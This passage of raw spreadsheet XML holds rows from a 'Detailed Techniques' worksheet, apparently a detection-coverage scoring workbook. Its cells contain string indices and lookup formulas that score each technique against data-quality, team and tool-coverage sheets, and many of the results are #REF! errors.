        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F20&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F20))-LEN(SUBSTITUTE(TRIM(F20),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W20" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X20" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F20&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F20))-LEN(SUBSTITUTE(TRIM(F20),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y20" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="21" spans="1:25" ht="71.25" x14ac:dyDescent="0.45">
      <c r="A21" s="8" t="s">
        <v>17</v>
      </c>
      <c r="B21" s="8" t="s">
        <v>8</v>
      </c>
      <c r="C21" s="8" t="s">
        <v>370</v>
      </c>
      <c r="D21" s="10" t="s">
        <v>371</v>
      </c>
      <c r="E21" s="10" t="s">
        <v>372</v>
      </c>
      <c r="F21" s="10" t="s">
        <v>373</v>
      </c>
      <c r="G21" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K21,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H21" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F21&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F21))-LEN(SUBSTITUTE(TRIM(F21),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I21" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F21&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F21))-LEN(SUBSTITUTE(TRIM(F21),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J21" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F21&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F21))-LEN(SUBSTITUTE(TRIM(F21),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K21" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L21" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F21&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F21))-LEN(SUBSTITUTE(TRIM(F21),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M21" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N21" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F21&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F21))-LEN(SUBSTITUTE(TRIM(F21),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O21" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P21" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F21&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F21))-LEN(SUBSTITUTE(TRIM(F21),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q21" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R21" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F21&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F21))-LEN(SUBSTITUTE(TRIM(F21),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S21" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T21" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F21&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F21))-LEN(SUBSTITUTE(TRIM(F21),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U21" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V21" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F21&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F21))-LEN(SUBSTITUTE(TRIM(F21),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W21" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X21" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F21&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F21))-LEN(SUBSTITUTE(TRIM(F21),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y21" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="22" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A22" s="8" t="s">
        <v>93</v>
      </c>
      <c r="B22" s="8" t="s">
        <v>5</v>
      </c>
      <c r="C22" s="8" t="s">
        <v>374</v>
      </c>
      <c r="D22" s="10" t="s">
        <v>375</v>
      </c>
      <c r="E22" s="10" t="s">
        <v>376</v>
      </c>
      <c r="F22" s="10" t="s">
        <v>377</v>
      </c>
      <c r="G22" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K22,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H22" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F22&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F22))-LEN(SUBSTITUTE(TRIM(F22),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I22" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F22&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F22))-LEN(SUBSTITUTE(TRIM(F22),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J22" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F22&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F22))-LEN(SUBSTITUTE(TRIM(F22),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K22" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L22" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F22&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F22))-LEN(SUBSTITUTE(TRIM(F22),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M22" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N22" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F22&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F22))-LEN(SUBSTITUTE(TRIM(F22),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O22" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P22" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F22&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F22))-LEN(SUBSTITUTE(TRIM(F22),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q22" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R22" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F22&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F22))-LEN(SUBSTITUTE(TRIM(F22),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S22" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T22" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F22&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F22))-LEN(SUBSTITUTE(TRIM(F22),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U22" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V22" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F22&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F22))-LEN(SUBSTITUTE(TRIM(F22),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W22" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X22" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F22&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F22))-LEN(SUBSTITUTE(TRIM(F22),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y22" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="23" spans="1:25" ht="256.5" x14ac:dyDescent="0.45">
      <c r="A23" s="8" t="s">
        <v>37</v>
      </c>
      <c r="B23" s="8" t="s">
        <v>8</v>
      </c>
      <c r="C23" s="8" t="s">
        <v>378</v>
      </c>
      <c r="D23" s="10" t="s">
        <v>379</v>
      </c>
      <c r="E23" s="10" t="s">
        <v>380</v>
      </c>
      <c r="F23" s="10" t="s">
        <v>381</v>
      </c>
      <c r="G23" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K23,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H23" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F23&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F23))-LEN(SUBSTITUTE(TRIM(F23),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I23" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F23&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F23))-LEN(SUBSTITUTE(TRIM(F23),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J23" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F23&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F23))-LEN(SUBSTITUTE(TRIM(F23),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K23" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L23" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F23&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F23))-LEN(SUBSTITUTE(TRIM(F23),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M23" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N23" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F23&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F23))-LEN(SUBSTITUTE(TRIM(F23),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O23" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P23" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F23&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F23))-LEN(SUBSTITUTE(TRIM(F23),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q23" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R23" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F23&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F23))-LEN(SUBSTITUTE(TRIM(F23),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S23" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T23" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F23&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F23))-LEN(SUBSTITUTE(TRIM(F23),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U23" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V23" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F23&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F23))-LEN(SUBSTITUTE(TRIM(F23),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W23" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X23" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F23&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F23))-LEN(SUBSTITUTE(TRIM(F23),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y23" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="24" spans="1:25" ht="114" x14ac:dyDescent="0.45">
      <c r="A24" s="8" t="s">
        <v>212</v>
      </c>
      <c r="B24" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C24" s="8" t="s">
        <v>382</v>
      </c>
      <c r="D24" s="10" t="s">
        <v>383</v>
      </c>
      <c r="E24" s="10" t="s">
        <v>384</v>
      </c>
      <c r="F24" s="10" t="s">
        <v>385</v>
      </c>
      <c r="G24" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K24,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H24" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F24&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F24))-LEN(SUBSTITUTE(TRIM(F24),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I24" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F24&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F24))-LEN(SUBSTITUTE(TRIM(F24),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J24" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F24&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F24))-LEN(SUBSTITUTE(TRIM(F24),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K24" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L24" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F24&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F24))-LEN(SUBSTITUTE(TRIM(F24),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M24" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N24" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F24&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F24))-LEN(SUBSTITUTE(TRIM(F24),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O24" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P24" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F24&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F24))-LEN(SUBSTITUTE(TRIM(F24),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q24" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R24" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F24&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F24))-LEN(SUBSTITUTE(TRIM(F24),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S24" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T24" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F24&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F24))-LEN(SUBSTITUTE(TRIM(F24),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U24" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V24" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F24&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F24))-LEN(SUBSTITUTE(TRIM(F24),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W24" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X24" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F24&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F24))-LEN(SUBSTITUTE(TRIM(F24),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y24" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="25" spans="1:25" ht="171" x14ac:dyDescent="0.45">
      <c r="A25" s="8" t="s">
        <v>57</v>
      </c>
      <c r="B25" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C25" s="8" t="s">
        <v>386</v>
      </c>
      <c r="D25" s="10" t="s">
        <v>387</v>
      </c>
      <c r="E25" s="10" t="s">
        <v>388</v>
      </c>
      <c r="F25" s="10" t="s">
        <v>389</v>
      </c>
      <c r="G25" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K25,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H25" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F25&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F25))-LEN(SUBSTITUTE(TRIM(F25),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I25" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F25&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F25))-LEN(SUBSTITUTE(TRIM(F25),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J25" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F25&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F25))-LEN(SUBSTITUTE(TRIM(F25),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K25" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L25" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F25&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F25))-LEN(SUBSTITUTE(TRIM(F25),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M25" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N25" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F25&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F25))-LEN(SUBSTITUTE(TRIM(F25),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O25" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P25" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F25&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F25))-LEN(SUBSTITUTE(TRIM(F25),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q25" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R25" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F25&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F25))-LEN(SUBSTITUTE(TRIM(F25),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S25" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T25" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F25&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F25))-LEN(SUBSTITUTE(TRIM(F25),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U25" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V25" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F25&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F25))-LEN(SUBSTITUTE(TRIM(F25),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W25" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X25" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F25&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F25))-LEN(SUBSTITUTE(TRIM(F25),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y25" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="26" spans="1:25" ht="114" x14ac:dyDescent="0.45">
      <c r="A26" s="8" t="s">
        <v>66</v>
      </c>
      <c r="B26" s="8" t="s">
        <v>7</v>
      </c>
      <c r="C26" s="8" t="s">
        <v>390</v>
      </c>
      <c r="D26" s="10" t="s">
        <v>391</v>
      </c>
      <c r="E26" s="10" t="s">
        <v>392</v>
      </c>
      <c r="F26" s="10" t="s">
        <v>316</v>
      </c>
      <c r="G26" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K26,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H26" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F26&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F26))-LEN(SUBSTITUTE(TRIM(F26),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I26" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F26&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F26))-LEN(SUBSTITUTE(TRIM(F26),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J26" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F26&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F26))-LEN(SUBSTITUTE(TRIM(F26),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K26" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L26" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F26&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F26))-LEN(SUBSTITUTE(TRIM(F26),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M26" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N26" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F26&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F26))-LEN(SUBSTITUTE(TRIM(F26),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O26" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P26" s="20" t="e">
